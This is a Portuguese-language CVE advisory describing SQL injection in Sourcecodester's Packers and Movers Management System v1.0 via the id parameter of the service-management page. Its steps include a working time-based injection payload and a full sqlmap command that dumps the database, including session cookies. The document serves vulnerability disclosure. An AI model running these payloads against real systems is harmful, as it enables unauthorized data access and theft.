CVE-2024-48427
Descrição
Uma vulnerabilidade de injeção SQL no Sourcecodester Packers and Movers Management System v1.0 permite que usuários autenticados remotos executem comandos SQL arbitrários por meio do parâmetro id em /mpms/admin/?page=services/manage_service&id
Tipo de Vulnerabilidade
Injeção SQL
Fornecedor do Produto
Sourcecodester
Base do código do produto afetado:
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
Componente afetado:
O parâmetro id do Update Service Details em /mpms/admin/?page=services/manage_service&id
Vetores de Ataque:
- Configure a aplicação localmente e faça login no painel administrativo usando as credenciais padrão fornecidas.
- Navegue até a página vulnerável: http://localhost/mpms/admin/?page=services/manage_service&id=2
- Injete o payload SQL no parâmetro id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- Observe a resposta da aplicação: a página deve demorar visivelmente mais (5 segundos) para carregar se a injeção for bem-sucedida, confirmando que o parâmetro id é vulnerável a injeção SQL.
- Agora execute a ferramenta SQLMap para extrair os detalhes do banco de dados:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
Referência:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection